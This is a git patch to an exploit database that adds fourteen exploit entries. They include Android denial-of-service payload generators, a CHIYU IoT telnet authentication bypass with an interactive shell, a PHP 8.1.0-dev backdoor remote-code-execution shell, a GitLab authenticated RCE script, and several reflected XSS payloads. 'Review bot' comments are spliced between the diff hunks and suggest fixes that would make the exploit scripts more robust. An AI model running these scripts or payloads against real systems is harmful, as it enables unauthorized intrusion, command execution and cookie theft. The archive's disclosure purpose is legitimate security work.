From a9fa314bbfcf3fd6b178434aabc9fe7c37207af2 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 4 Jun 2021 05:01:54 +0000 Subject: [PATCH] DB: 2021-06-04 14 changes to exploits/shellcodes BasicNote 1.1.9 - Denial of Service (PoC) ColorNote 4.1.9 - Denial of Service (PoC) Notepad notes 2.6.7 - Denial of Service (PoC) Blacknote 2.2.1 - Denial of Service (PoC) CHIYU IoT Devices - 'Telnet' Authentication Bypass PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution Seo Panel 4.8.0 - 'from_time' Reflected XSS CHIYU IoT Devices - Denial of Service (DoS) FUDForum 3.1.0 - 'srch' Reflected XSS FUDForum 3.1.0 - 'author' Reflected XSS Gitlab 13.9.3 - Remote Code Execution (Authenticated) 4Images 1.8 - 'redirect' Reflected XSS --- exploits/android/dos/49938.py | 35 +++++++++ exploits/android/dos/49939.py | 37 ++++++++++ exploits/android/dos/49940.py | 35 +++++++++ exploits/android/dos/49941.py | 35 +++++++++ exploits/hardware/remote/49936.py | 81 ++++++++++++++++++++ exploits/hardware/webapps/49937.txt | 47 ++++++++++++ exploits/multiple/webapps/49163.txt | 1 + exploits/multiple/webapps/49884.txt | 1 + exploits/php/webapps/49933.py | 53 ++++++++++++++ exploits/php/webapps/49935.txt | 19 +++++ exploits/php/webapps/49942.txt | 19 +++++ exploits/php/webapps/49943.txt | 19 +++++ exploits/php/webapps/49945.txt | 17 +++++ exploits/ruby/webapps/49944.py | 110 ++++++++++++++++++++++++++++ files_exploits.csv | 12 +++ 15 files changed, 521 insertions(+) create mode 100755 exploits/android/dos/49938.py create mode 100755 exploits/android/dos/49939.py create mode 100755 exploits/android/dos/49940.py create mode 100755 exploits/android/dos/49941.py create mode 100755 exploits/hardware/remote/49936.py create mode 100644 exploits/hardware/webapps/49937.txt create mode 100755 exploits/php/webapps/49933.py create mode 100644 exploits/php/webapps/49935.txt create mode 100644 exploits/php/webapps/49942.txt create mode 100644 exploits/php/webapps/49943.txt create mode 100644 exploits/php/webapps/49945.txt create mode 100755 exploits/ruby/webapps/49944.py 
diff --git a/exploits/android/dos/49938.py b/exploits/android/dos/49938.py
new file mode 100755
index 000000000..7e96e468d
--- /dev/null
+++ b/exploits/android/dos/49938.py
@@ -0,0 +1,35 @@
+# Exploit Title: BasicNote 1.1.9 - Denial of Service (PoC)
+# Date: 2021-06-02
+# Author: Brian Rodríguez
+# Download Link: https://play.google.com/store/apps/details?id=notizen.basic.notes.notas.note.notepad&hl=es_MX
+# Version: 1.1.9
+# Category: DoS (Android)
+
+##### Vulnerability #####
+
+BasicNote - Notas, Bloc de notas is vulnerable to a DoS condition when two long lists of characters are being used when creating a note:
+
+# STEPS #
+# Open the program
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will causes application stop working.
+
+I have been able to test this exploit against Android 8.0.
+
+##### PoC #####
+
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/android/dos/49939.py b/exploits/android/dos/49939.py
new file mode 100755
index 000000000..a7a0a1582
--- /dev/null
+++ b/exploits/android/dos/49939.py
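Review bot: The payload writer at the end of this hunk pairs a bare `except:` with a manual `f.close()`, so an exception raised inside `f.write` leaves the handle open and the bare clause also swallows `KeyboardInterrupt` and `SystemExit`; `with open("payload.txt", "w") as f: f.write(buffer)` guarded by `except OSError:` covers both. The identical block is repeated verbatim in 49939.py, 49940.py and 49941.py in the following hunks, so the same change applies there. The `#!/usr/bin/env python` shebang together with the `print (...)` spacing leaves the intended interpreter version ambiguous; `"\x41" * 350000` is a `str` on Python 3, so the file is written in text mode either way, and a `python3` shebang would make that explicit.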
@@ -0,0 +1,37 @@
+# Exploit Title: ColorNote 4.1.9 - Denial of Service (PoC)
+# Date: 2021-06-02
+# Author: Brian Rodríguez
+# Download Link: https://play.google.com/store/apps/details?id=com.socialnmobile.dictapps.notepad.color.note&hl=es_MX
+# Version: 4.1.9
+# Category: DoS (Android)
+
+##### Vulnerability #####
+
+Color Note is vulnerable to a DoS condition when a long list of characters is being used.
+
+# STEPS #
+# Open the program
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt in the new note.
+# Click the "Return" button twice.
+# Start clicking the screen.
+# Crashed
+
+Successful exploitation will causes application stop working.
+
+I have been able to test this exploit against Android 8.0.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/android/dos/49940.py b/exploits/android/dos/49940.py
new file mode 100755
index 000000000..91566e8a4
--- /dev/null
+++ b/exploits/android/dos/49940.py
@@ -0,0 +1,35 @@
+# Exploit Title: Notepad notes 2.6.7 - Denial of Service (PoC)
+# Date: 2021-06-02
+# Author: Brian Rodríguez
+# Download Link: https://play.google.com/store/apps/details?id=com.hlcsdev.x.notepad&hl=es_MX
+# Version: 2.6.7
+# Category: DoS (Android)
+
+##### Vulnerability #####
+
+Bloc de notas is vulnerable to a DoS condition when a long lists of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause application to stop working.
+
+I have been able to test this exploit against Android 8.0.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/android/dos/49941.py b/exploits/android/dos/49941.py
new file mode 100755
index 000000000..cee03c492
--- /dev/null
+++ b/exploits/android/dos/49941.py
@@ -0,0 +1,35 @@
+# Exploit Title: Blacknote 2.2.1 - Denial of Service (PoC)
+# Date: 2021-06-02
+# Author: Brian Rodríguez
+# Download Link: https://play.google.com/store/apps/details?id=notepad.note.notas.notes.notizen&hl=es_MX
+# Version: 2.2.1
+# Category: DoS (Android)
+
+##### Vulnerability #####
+
+BlackNote Bloc de notas is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against Android 8.0.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/hardware/remote/49936.py b/exploits/hardware/remote/49936.py
new file mode 100755
index 000000000..514df2976
--- /dev/null
+++ b/exploits/hardware/remote/49936.py
@@ -0,0 +1,81 @@
+# Exploit Title: CHIYU IoT Devices - 'Telnet' Authentication Bypass
+# Date: 01/06/2021
+# Exploit Author: sirpedrotavares
+# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
+# Software Link: https://www.chiyu-tech.com/category-hardware.html
+# Version: BF-430, BF-431, BF-450M, and SEMAC - all firmware versions < June 2021
+# Tested on: BF-430, BF-431, BF-450M, and SEMAC
+# CVE: CVE-2021-31251
+# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
+
+"""
+Description: Several IoT devices from the CHIYU Technology firm are
+vulnerable to a flaw that permits bypassing the telnet authentication
+process due to an overflow during the negotiation of the telnet protocol.
+Telnet authentication is bypassed by supplying a specially malformed
+request, and an attacker may force the remote telnet server to believe that
+the user has already authenticated. Several models are vulnerable,
+including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware
+versions.
+CVE ID: CVE-2021-31251
+CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
+"""
+
+#!/usr/bin/env python3
+
+# usage: python3 exploit.py IP
+
+import socket
+import time
+import sys
+
+HOST = sys.argv[1]
+PORT = 23
+
+socket.setdefaulttimeout(10)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+ connect = s.connect_ex((HOST, PORT))
+ try:
+ print("[+] Try to connect...\n")
+ time.sleep(1)
+ s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
+ s.recv(1024).strip()
+ s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
+ s.recv(1024).strip()
+ s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
+ result = s.recv(1024).strip()
+ if result != b'\xff\xfe\x01':
+ s.send(b"\x09")
+ result = s.recv(1024).strip()
+
+ if connect == 0 and "sername" not in str(result):
+ if b"\xff\xfe\x01" == result:
+ print("Connected! 
;)\ntype: \"help\"\n\n")
+ while 1:
+ cmd = input("(CHIYU pwnShell:) $ ")
+ body = cmd+"\n"
+ s.send(body.encode('utf-8', 'ignore'))
+ result = s.recv(1024).decode('utf8', 'ignore')
+
+ if not len(result):
+ print("[+] CHIYU device not available, try
+again ... (terminating)")
+ s.close()
+ break
+ print(result.strip('CMD>'))
+ b = "\n"
+ s.send(b.encode('utf-8', 'ignore'))
+ result = s.recv(1024).decode()
+ print(result.strip('CMD>'))
+ except KeyboardInterrupt:
+ print("\n[+] ^C Received, closing connection")
+ s.close()
+ except EOFError:
+ print("\n[+] ^D Received, closing connection")
+ s.close()
+
+except socket.error:
+ print("[+] Unable to connect to CHIYU device.")
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49937.txt b/exploits/hardware/webapps/49937.txt
new file mode 100644
index 000000000..bd10c5390
--- /dev/null
+++ b/exploits/hardware/webapps/49937.txt
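Review bot: The outer `except socket.error:` at the end of the hunk reports "Unable to connect" for every `OSError`, including the 10-second `socket.timeout` that any of the `recv` calls can raise after a successful connect, and on that path `s` is never closed; opening the socket as `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:` would release it on every exit and the handler should name the timeout separately from a refused connection. The message literal in `print("[+] CHIYU device not available, try` continues on the next added line `again ... (terminating)")`, and the hunk's 81-line count indicates that break is in the committed file rather than an artifact of this listing, which leaves the string unterminated so the module does not parse as written. `HOST = sys.argv[1]` also raises a bare `IndexError` when the script is run without an argument; a `len(sys.argv) != 2` check that prints the usage line from the comment above it would be the conventional guard.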
@@ -0,0 +1,47 @@
+# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS)
+# Date: 01/06/2021
+# Exploit Author: sirpedrotavares
+# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
+# Software Link: https://www.chiyu-tech.com/category-hardware.html
+# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021
+# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC
+# CVE: CVE-2021-31642
+# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
+
+Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.
+CVE ID: CVE-2021-31642
+CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
+URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642
+
+Affected parameter: page=Component: if.cgi
+Payload:
+if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
+
+====HTTP request======
+GET
+/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
+HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
+Gecko/20100101 Firefox/87.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
+Accept-Encoding: gzip, deflate
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: close
+Referer: http://127.0.0.1/AccLog.htm
+Cookie: fresh=
+Upgrade-Insecure-Requests: 1
+
+
+
+Steps to reproduce:
+ 1. Navigate to the vulnerable device
+ 2. Make a GET request to the CGI component (if.cgi)
+ 3. Append the payload at the end of the vulnerable parameter (page)
+ 4. 
Submit the request and observe payload execution + + + Mitigation: The latest version of the CHIYU firmware should be installed +to mitigate this vulnerability. \ No newline at end of file diff --git a/exploits/multiple/webapps/49163.txt b/exploits/multiple/webapps/49163.txt index a77aed857..54c55dbc7 100644 --- a/exploits/multiple/webapps/49163.txt +++ b/exploits/multiple/webapps/49163.txt @@ -5,6 +5,7 @@ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lssems.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 +# CVE: CVE-2021-3278 Step 1: Open the URL http://localhost:8080/lssems/admin/login.php Step 2: use payload Aditya' or 1=1# in user and password field diff --git a/exploits/multiple/webapps/49884.txt b/exploits/multiple/webapps/49884.txt index cb5a2b096..0823f6141 100644 --- a/exploits/multiple/webapps/49884.txt +++ b/exploits/multiple/webapps/49884.txt @@ -4,6 +4,7 @@ # Vendor Homepage: https://www.in4velocity.com/in4suite-erp.html # Version: In4Suite ERP 3.2.74.1370 # Tested on: Windows +# CVE: CVE-2021-27828 ----------------------------------------- diff --git a/exploits/php/webapps/49933.py b/exploits/php/webapps/49933.py new file mode 100755 index 000000000..8191a6386 --- /dev/null +++ b/exploits/php/webapps/49933.py 
@@ -0,0 +1,53 @@
+# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
+# Date: 23 may 2021
+# Exploit Author: flast101
+# Vendor Homepage: https://www.php.net/
+# Software Link:
+# - https://hub.docker.com/r/phpdaily/php
+# - https://github.com/phpdaily/php
+# Version: 8.1.0-dev
+# Tested on: Ubuntu 20.04
+# References:
+# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
+# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
+
+"""
+Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
+Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
+Contact: flast101.sec@gmail.com
+
+An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
+The following exploit uses the backdoor to provide a pseudo shell ont the host.
+"""
+
+#!/usr/bin/env python3
+import os
+import re
+import requests
+
+host = input("Enter the full host url:\n")
+request = requests.Session()
+response = request.get(host)
+
+if str(response) == '':
+ print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
+ try:
+ while 1:
+ cmd = input("$ ")
+ headers = {
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
+ "User-Agentt": "zerodiumsystem('" + cmd + "');"
+ }
+ response = request.get(host, headers = headers, allow_redirects = False)
+ current_page = response.text
+ stdout = current_page.split('',1)
+ text = print(stdout[0])
+ except KeyboardInterrupt:
+ print("Exiting...")
+ exit
+
+else:
+ print("\r")
+ print(response)
+ print("Host is not available, aborting...")
+ exit
\ No newline at end of file
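Review bot: Both termination paths end in a bare `exit` expression (after `print("Exiting...")` and after `print("Host is not available, aborting...")`), which only evaluates the `site` helper object without calling it, so neither branch actually terminates; `sys.exit(0)` and `sys.exit(1)` with an `import sys` would, and the latter should carry a non-zero status since it is the failure path. `text = print(stdout[0])` assigns `None` for the same reason and the name is never read; `import os` and `import re` are likewise unused. The empty literals in `str(response) == ''` and `current_page.split('',1)` look like angle-bracketed text dropped by the rendering rather than what was committed, so they should be checked against the file before the first condition is read as always false.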
diff --git a/exploits/php/webapps/49935.txt b/exploits/php/webapps/49935.txt
new file mode 100644
index 000000000..be85c5a7a
--- /dev/null
+++ b/exploits/php/webapps/49935.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Seo Panel 4.8.0 - 'from_time' Reflected XSS
+# Date: 23-03-2021
+# Exploit Author: Piyush Patil
+# Vendor Homepage: https://www.seopanel.org/
+# Version: Seo Panel 4.8.0
+# Tested on: Windows 10 and Kali
+# CVE : CVE-2021-28420
+
+-Description:
+A cross-site scripting (XSS) issue in Seo Panel 4.8.0 allows remote
+attackers to inject JavaScript via alerts.php and the "from_time" parameter.
+
+-Payload used:
+x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
+
+-Steps to reproduce:
+1- Login to SEO admin panel
+2- Visit: http://localhost/alerts.php?alert_category=general&from_time=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&keyword=&to_time=2021-03-11
+3- Hover your mouse to "Period" field
\ No newline at end of file
diff --git a/exploits/php/webapps/49942.txt b/exploits/php/webapps/49942.txt
new file mode 100644
index 000000000..aec188404
--- /dev/null
+++ b/exploits/php/webapps/49942.txt
@@ -0,0 +1,19 @@
+# Exploit Title: FUDForum 3.1.0 - 'srch' Reflected XSS
+# Exploit Author: Piyush Patil
+# Vendor Homepage: http://fudforum.org/
+# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.1.0.zip/download
+# Version: FUDForum 3.1.0
+# Tested on: Windows 10 and Kali
+# CVE : CVE-2021-27519
+
+-Description:
+A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the "srch" parameter.
+
+
+-Payload used:
+x" onmouseover=alert(1) x="
+
+-Steps to reproduce:
+1- goto https://localhost/fudforum/index.php?t=search&
+2- In "forum search" option, paste XSS payload
+3- Hover your mouse to "x" and XSS will get triggered
\ No newline at end of file
diff --git a/exploits/php/webapps/49943.txt b/exploits/php/webapps/49943.txt
new file mode 100644
index 000000000..8f2f9fa2e
--- /dev/null
+++ b/exploits/php/webapps/49943.txt
@@ -0,0 +1,19 @@
+# Exploit Title: FUDForum 3.1.0 - 'author' Reflected XSS
+# Exploit Author: Piyush Patil
+# Vendor Homepage: http://fudforum.org/
+# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.1.0.zip/download
+# Version: FUDForum 3.1.0
+# Tested on: Windows 10 and Kali
+# CVE : CVE-2021-27520
+
+-Description:
+A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the "author" parameter.
+
+
+-Payload used:
+y" onmouseover=alert(2) y="
+
+-Steps to reproduce:
+1- goto https://localhost/fudforum/index.php?t=search&
+2- In the "Filter by User" search option, paste XSS payload
+3- Hover your mouse to "y" and XSS will get triggered
\ No newline at end of file
diff --git a/exploits/php/webapps/49945.txt b/exploits/php/webapps/49945.txt
new file mode 100644
index 000000000..fa1087e13
--- /dev/null
+++ b/exploits/php/webapps/49945.txt
@@ -0,0 +1,17 @@
+# Exploit Title: 4Images 1.8 - 'redirect' Reflected XSS
+# Exploit Author: Piyush Patil
+# Vendor Homepage: https://www.4homepages.de/
+# Software Link: https://www.4homepages.de/?download=4images1.8.zip&code=81da0c7b5208e172ea83d879634f51d6
+# Version: 4Images Gallery 1.8
+# Tested on: Windows 10 and Kali
+# CVE : CVE-2021-27308
+
+-Description:
+A cross-site scripting (XSS) vulnerability in the admin login panel in 4images version 1.8 allows remote attackers to inject JavaScript via the "redirect" parameter.
+
+
+-Steps to reproduce:
+1- Goto 4images admin panel page (demo instance: https://localhost/4images/admin/index.php)
+2- Enter the credentials , Turn on the intercept and click on "Login"
+3- copy paste the XSS payload after redirect=./../admin/index.php%3Fsessionid=xxxxxPASTEPAYLOADHERE
+4-Forward the request and you can see XSS is triggered.
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49944.py b/exploits/ruby/webapps/49944.py
new file mode 100755
index 000000000..d9aaeb1ca
--- /dev/null
+++ b/exploits/ruby/webapps/49944.py
@@ -0,0 +1,110 @@
+# Exploit Title: Gitlab 13.9.3 - Remote Code Execution (Authenticated)
+# Date: 02/06/2021
+# Exploit Author: enox
+# Vendor Homepage: https://about.gitlab.com/
+# Software Link: https://gitlab.com/
+# Version: < 13.9.4
+# Tested On: Ubuntu 20.04
+# Environment: Gitlab 13.9.1 CE
+# Credits: https://hackerone.com/reports/1125425
+
+#!/usr/bin/python3
+
+import requests
+from bs4 import BeautifulSoup
+import random
+import os
+import argparse
+
+parser = argparse.ArgumentParser(description='GitLab < 13.9.4 RCE')
+parser.add_argument('-u', help='Username', required=True)
+parser.add_argument('-p', help='Password', required=True)
+parser.add_argument('-c', help='Command', required=True)
+parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True)
+args = parser.parse_args()
+
+username = args.u
+password = args.p
+gitlab_url = args.t
+command = args.c
+
+session = requests.Session()
+
+# Authenticating
+print("[1] Authenticating")
+r = session.get(gitlab_url + "/users/sign_in")
+soup = BeautifulSoup(r.text, features="lxml")
+token = soup.findAll('meta')[16].get("content")
+
+login_form = {
+ "authenticity_token": token,
+ "user[login]": username,
+ "user[password]": password,
+ "user[remember_me]": "0"
+}
+r = session.post(f"{gitlab_url}/users/sign_in", data=login_form)
+
+if r.status_code != 200:
+ exit(f"Login Failed:{r.text}")
+else:
+ print("Successfully Authenticated")
+
+# Creating Project
+print("[2] Creating Project")
+r = session.get(f"{gitlab_url}/projects/new")
+soup = BeautifulSoup(r.text, features="lxml")
+
+project_token = soup.findAll('meta')[16].get("content")
+project_token = project_token.replace("==", "%3D%3D")
+project_token = project_token.replace("+", "%2B")
+project_name = f'project{random.randrange(1, 10000)}'
+cookies = {'sidebar_collapsed': 'false','event_filter': 'all','hide_auto_devops_implicitly_enabled_banner_1': 'false','_gitlab_session': session.cookies['_gitlab_session'],}
+
+payload=f"utf8=%E2%9C%93&authenticity_token={project_token}&project%5Bci_cd_only%5D=false&project%5Bname%5D={project_name}&project%5Bpath%5D={project_name}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=20"
+
+r = session.post(gitlab_url+'/projects', data=payload, cookies=cookies, verify=False)
+
+if "The change you requested was rejected." in r.text:
+ exit('Exploit failed, check input params')
+else:
+ print("Successfully created project")
+
+
+# Cloning Wiki and Writing Files
+print("[3] Pushing files to the project wiki")
+wiki_url = f'{gitlab_url}/{username}/{project_name}.wiki.git'
+os.system(f"git clone {wiki_url} /tmp/project")
+
+f1 = open("/tmp/project/load1.rmd","w")
+f1.write('{::options syntax_highlighter="rouge" syntax_highlighter_opts="{formatter: Redis, driver: ../get_process_mem\}" /}\n\n')
+f1.write('~~~ ruby\n')
+f1.write(' def what?\n')
+f1.write(' 42\n')
+f1.write(' end\n')
+f1.write('~~~\n')
+f1.close()
+
+f2 = open("/tmp/project/load2.rmd","w")
+temp='{::options syntax_highlighter="rouge" syntax_highlighter_opts="{a: \'`'+command+'`\', formatter: GetProcessMem\}" /}\n\n'
+f2.write(temp)
+f2.write('~~~ ruby\n')
+f2.write(' def what?\n')
+f2.write(' 42\n')
+f2.write(' end\n')
+f2.write('~~~\n')
+f2.close()
+
+# It will prompt for user and pass. Enter it.
+os.system('cd /tmp/project && git add -A . && git commit -m "Commit69" && git push')
+
+print("Succesfully Pushed")
+
+# Cleaning Up
+os.system('rm -rf /tmp/project')
+
+# Triggering RCE
+
+print("[4] Triggering RCE")
+trigger_url=f"{gitlab_url}/{username}/{project_name}/-/wikis/load2"
+
+r = session.get(trigger_url, cookies=cookies, verify=False)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f3bb35fe5..b72ed94b7 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
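Review bot: The wiki checkout goes to the fixed path `/tmp/project` and is later deleted with `os.system('rm -rf /tmp/project')`, so a pre-existing directory or symlink at that path on the operator's own host is silently reused and then removed, and the `open("/tmp/project/load1.rmd","w")` / `load2.rmd` calls raise `FileNotFoundError` when the unchecked `git clone` fails; `workdir = tempfile.mkdtemp()`, paths built with `os.path.join(workdir, ...)` and `shutil.rmtree(workdir)` in a `finally` address both. None of the `os.system` return codes are examined, including the `git push` that the comment says prompts for credentials, so the script reports "Succesfully Pushed" regardless of outcome, and `f1`/`f2` are opened without `with`. `verify=False` on the `session.post` and `session.get` calls disables TLS certificate validation for an exchange that carries the user's GitLab credentials and session cookie; it should be an explicit opt-in argument rather than the unconditional default.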
@@ -6785,6 +6785,10 @@ id,file,description,date,author,type,platform,port
 49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",2021-05-24,"Ismael Nava",dos,windows,
 49906,exploits/windows/dos/49906.py,"RarmaRadio 2.72.8 - Denial of Service (PoC)",2021-05-26,"Ismael Nava",dos,windows,
 49917,exploits/windows/dos/49917.py,"DupTerminator 1.4.5639.37199 - Denial of Service (PoC)",2021-06-01,"Brian Rodriguez",dos,windows,
+49938,exploits/android/dos/49938.py,"BasicNote 1.1.9 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
+49939,exploits/android/dos/49939.py,"ColorNote 4.1.9 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
+49940,exploits/android/dos/49940.py,"Notepad notes 2.6.7 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
+49941,exploits/android/dos/49941.py,"Blacknote 2.2.1 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -18475,6 +18479,7 @@ id,file,description,date,author,type,platform,port
 49815,exploits/linux/remote/49815.py,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)",2021-04-30,liewehacksie,remote,linux,
 49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",2021-05-21,legend,remote,solaris,
 49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",2021-05-26,Shellbr3ak,remote,linux,
+49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",2021-06-03,sirpedrotavares,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -44095,3 +44100,10 @@ id,file,description,date,author,type,platform,port
 49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,
 49931,exploits/php/webapps/49931.txt,"Seo Panel 4.8.0 - 'search_name' Reflected XSS",2021-06-02,"Piyush Patil",webapps,php,
 49932,exploits/php/webapps/49932.txt,"Seo Panel 4.8.0 - 'category' Reflected XSS",2021-06-02,"Piyush Patil",webapps,php,
+49933,exploits/php/webapps/49933.py,"PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution",2021-06-03,flast101,webapps,php,
+49935,exploits/php/webapps/49935.txt,"Seo Panel 4.8.0 - 'from_time' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,
+49937,exploits/hardware/webapps/49937.txt,"CHIYU IoT Devices - Denial of Service (DoS)",2021-06-03,sirpedrotavares,webapps,hardware,
+49942,exploits/php/webapps/49942.txt,"FUDForum 3.1.0 - 'srch' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,
+49943,exploits/php/webapps/49943.txt,"FUDForum 3.1.0 - 'author' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,
+49944,exploits/ruby/webapps/49944.py,"Gitlab 13.9.3 - Remote Code Execution (Authenticated)",2021-06-03,enox,webapps,ruby,
+49945,exploits/php/webapps/49945.txt,"4Images 1.8 - 'redirect' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,